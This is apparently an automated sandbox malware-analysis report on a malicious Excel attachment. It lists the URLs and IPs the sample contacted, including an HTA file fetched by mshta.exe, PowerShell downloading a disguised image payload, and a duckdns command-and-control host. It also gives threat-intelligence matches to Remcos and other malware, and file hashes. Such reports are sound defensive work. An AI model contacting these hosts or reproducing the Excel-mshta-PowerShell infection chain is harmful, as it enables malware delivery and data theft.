https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://185.235.137.223 | powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.0000000003440000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com | RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htasdVpl(C | mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.235.137.223pB7 | powershell.exe, 0000000E.00000002.505047293.0000000002785000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://o.aolcdn.com/ads/adswrappermsni.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/?ocid=iehp | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://static.chartbeat.com/js/chartbeat.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/de-de/?ocid=iehp | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | RegAsm.exe | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.490691993.0000000002271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.524628832.0000000002481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.505047293.00000000023D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.hta... | mshta.exe, 00000004.00000003.475715183.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476106334.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474272874.0000000000503000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.0000000000503000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://go.cr | powershell.exe, 0000000E.00000002.504689494.00000000003CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htapVpl( | mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.235.137.223/ | mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia601706.us.archive.org/2/items/new_image_ | powershell.exe, 0000000C.00000002.524628832.00000000027A7000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htaC: | mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/8/nrrV73987.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.512058781.0000000000459000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.235.137.223/200/pictu | powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zeep.ly/ | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476695899.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.235.137.223/200/pictureupdatedwithnewquality.tIFp | powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/ | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://185.235H | powershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.msn.com/ | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhv1E0C.tmp.21.dr | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        • Avira URL Cloud: safe
                        unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://ia601706.us.archive.orgpowershell.exe, 0000000E.00000002.505047293.00000000025D2000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://185.235.137.223/200/Nhpowershell.exe, 0000000E.00000002.505047293.0000000003277000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htajVpl(mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://185.235.137.223/xampp/ceo/IEnetcateudpationprocess.htahttp://185.235.137.223/xampp/ceo/IEnetcmshta.exe, 00000004.00000003.475198799.0000000002765000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001ABB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.msn.com/advertisement.ad.jsbhv1E0C.tmp.21.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.227.96 | ia601706.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
192.3.101.29 | camzeroconnect.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
185.235.137.223 | unknown | Iran (Islamic Republic of) | 202391 | AFRARASAIR | true
95.217.202.210 | zeep.ly | Germany | 24940 | HETZNER-ASDE | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1508122
Start date and time: 2024-09-09 17:47:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ_0230909024SEPT.xla.xlsx
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winXLSX@38/28@5/5
EGA Information:
• Successful, ratio: 85.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 173
• Number of non-executed functions: 298
Cookbook Comments:
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target mshta.exe, PID 3504 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: RFQ_0230909024SEPT.xla.xlsx
Time | Type | Description
11:48:56 | API Interceptor | 52x Sleep call for process: mshta.exe modified
11:48:59 | API Interceptor | 222x Sleep call for process: powershell.exe modified
11:49:06 | API Interceptor | 3x Sleep call for process: wscript.exe modified
11:49:13 | API Interceptor | 433x Sleep call for process: RegAsm.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
207.241.227.96 | xrrwwstCMd.docx | malicious | Remcos | -
192.3.101.29 | SWIFT050924.vbs | malicious | Remcos | -
192.3.101.29 | Revised SOA-INV023010924.xla.xlsx | malicious | Remcos | -
192.3.101.29 | RFQ_0030829024SEPT.xla.xlsx | malicious | Remcos | -
192.3.101.29 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtf | malicious | Remcos | -
192.3.101.29 | PMT-INV0230824AUG.xla.xlsx | malicious | Remcos | -
192.3.101.29 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | -
192.3.101.29 | PA-INV0230824 AUG.xla.xlsx | malicious | Remcos | -
192.3.101.29 | RFQ_0826024.xla.xlsx | malicious | Remcos | -
192.3.101.29 | RFQ-009230820240.xla.xlsx | malicious | Remcos | -
192.3.101.29 | RFQ-00923082024.xla.xlsx | malicious | Remcos | -
185.235.137.223 | buttersmoothcrashcandy.rtf | malicious | Unknown | 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF
95.217.202.210 | xrrwwstCMd.docx | malicious | Remcos | zeep.ly/rXgoN
178.237.33.50 | xrrwwstCMd.docx | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | fYHJsEQSv0.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | PxPsy1hml9.exe | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | XQmV6MKs53.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | GN31O4pSQN.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | OriginalBLShippingDocumentsInvoiceAwbCIPL0000.bat | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | DHL AWB BL Copy 8900893000.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Quotation.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmd | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | NDA_MD580 project.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
ia601706.us.archive.org | xrrwwstCMd.docx | malicious | Remcos | 207.241.227.96
camzeroconnect.duckdns.org | SWIFT050924.vbs | malicious | Remcos | 192.3.101.29
geoplugin.net | xrrwwstCMd.docx | malicious | Remcos | 178.237.33.50
geoplugin.net | fYHJsEQSv0.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PxPsy1hml9.exe | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | XQmV6MKs53.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | GN31O4pSQN.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | OriginalBLShippingDocumentsInvoiceAwbCIPL0000.bat | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | DHL AWB BL Copy 8900893000.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Quotation.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmd | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | NDA_MD580 project.exe | malicious | Remcos, GuLoader | 178.237.33.50
zeep.ly | xrrwwstCMd.docx | malicious | Remcos | 95.217.202.210
zeep.ly | http://goofle.com | malicious | Unknown | 95.217.202.210
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | xrrwwstCMd.docx | malicious | Remcos | 207.241.227.96
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtf | malicious | Remcos | 207.241.224.2
INTERNET-ARCHIVEUS | PO FT-151-2024 PETROMAT.xls | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | Inquiry_0476452.xls | malicious | Remcos | 207.241.224.2
INTERNET-ARCHIVEUS | Request for Quotation_1.js | malicious | PXRECVOWEIWOEI Stealer | 207.241.227.86
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | malicious | Remcos | 207.241.224.2
INTERNET-ARCHIVEUS | INV4092401.docx.doc | malicious | Remcos | 207.241.232.154
INTERNET-ARCHIVEUS | comprobante.xlam.xlsx | malicious | AgentTesla | 207.241.232.154
INTERNET-ARCHIVEUS | PO_00978876.vbs | malicious | Unknown | 207.241.232.154
AFRARASAIR | buttersmoothcrashcandy.rtf | malicious | Unknown | 185.235.137.223
AFRARASAIR | SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elf | malicious | Mirai | 185.49.104.3
AFRARASAIR | an3gpDV7uW.exe | malicious | LummaC | 185.235.137.54
AFRARASAIR | paTWrNAira.exe | malicious | LummaC | 185.235.137.54
AFRARASAIR | 2gQsoHaGEm.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | xvJv1BpknZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | PxuZ1WpCgf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | TEILll7BsZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | Pd3mM82Bs6.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
AFRARASAIR | c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar | 185.235.137.54
HETZNER-ASDE | xrrwwstCMd.docx | malicious | Remcos | 95.217.202.210
HETZNER-ASDE | myfile.exe | malicious | Sodinokibi, Chaos, Netwalker, Revil, TrojanRansom | 188.40.30.106
HETZNER-ASDE | doc_rfq Oferta KH 09281.pdf.com.exe | malicious | Quasar | 195.201.57.90
HETZNER-ASDE | Quotation.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 135.181.160.46
HETZNER-ASDE | uD9I18eLZ6.exe | malicious | PureLog Stealer, Raccoon Stealer v2, RedLine, zgRAT | 116.203.232.114
HETZNER-ASDE | http://pratikg7028.github.io/Task4 | malicious | HTMLPhisher | 78.46.22.25
HETZNER-ASDE | IDMan.exe | malicious | Fredy Stealer | 5.161.243.5
HETZNER-ASDE | IDMan.exe | malicious | Fredy Stealer | 5.161.243.5
HETZNER-ASDE | FZ6oyLoqGM.exe | malicious | Unknown | 159.69.88.171
HETZNER-ASDE | bin homebots io.bat | malicious | Unknown | 195.201.57.90
AS-COLOCROSSINGUS | GN31O4pSQN.exe | malicious | Remcos | 192.3.243.155
AS-COLOCROSSINGUS | Quotation.exe | malicious | Remcos | 23.95.60.82
AS-COLOCROSSINGUS | NDA_MD580 project.exe | malicious | Remcos, GuLoader | 192.210.150.17
AS-COLOCROSSINGUS | ORDER-249034489.XLS.js | malicious | WSHRat | 192.210.215.11
AS-COLOCROSSINGUS | SWIFT050924.vbs | malicious | Remcos | 192.3.101.29
AS-COLOCROSSINGUS | 17257307446d2d2990dfa7f8d43acc2caad03e86776087a4660c3bfc636a9c02b09252085d196.dat-decoded.exe | malicious | Remcos | 192.3.101.17
AS-COLOCROSSINGUS | AMERICAN GROUP.js | malicious | Remcos | 192.3.101.17
AS-COLOCROSSINGUS | https://saledelivery.zone/?cp=fmlcqhob | malicious | Unknown | 104.168.101.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtf | malicious | Remcos | 192.3.101.254
AS-COLOCROSSINGUS | vsi5ci7Lwd.exe | malicious | AsyncRAT | 198.23.197.108
Match (JA3 fingerprint) | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | xrrwwstCMd.docx | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtf | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | PO FT-151-2024 PETROMAT.xls | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | Inquiry_0476452.xls | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | INV4092401.docx.doc | malicious | Remcos | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | comprobante.xlam.xlsx | malicious | AgentTesla | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | Bill of Lading.xls | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.96
05af1f5ca1b87cc9cc9b25185115607d | Purchase Order.xlsm | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.96
7dcce5b76c8b17472d024758970a406b | xrrwwstCMd.docx | malicious | Remcos | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | PO FT-151-2024 PETROMAT.xls | malicious | Remcos | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | Inquiry_0476452.xls | malicious | Remcos | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | INV4092401.docx.doc | malicious | Remcos | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | Bill of Lading.xls | malicious | Snake Keylogger, VIP Keylogger | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | QUOTATION_SEPQTRA071244#U00faPDF.scr | malicious | Unknown | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsx | malicious | Unknown | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsx | malicious | Unknown | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.GenericKD.73998107.10440.22732.xlsx | malicious | Unknown | 95.217.202.210
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Exploit.CVE-2017-0199.121.20522.7152.xlsx | malicious | FormBook | 95.217.202.210
                                              No context
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4742
                                              Entropy (8bit):4.8105940880640246
                                              Encrypted:false
                                              SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                              MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                              SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                              SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                              SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                              Malicious:false
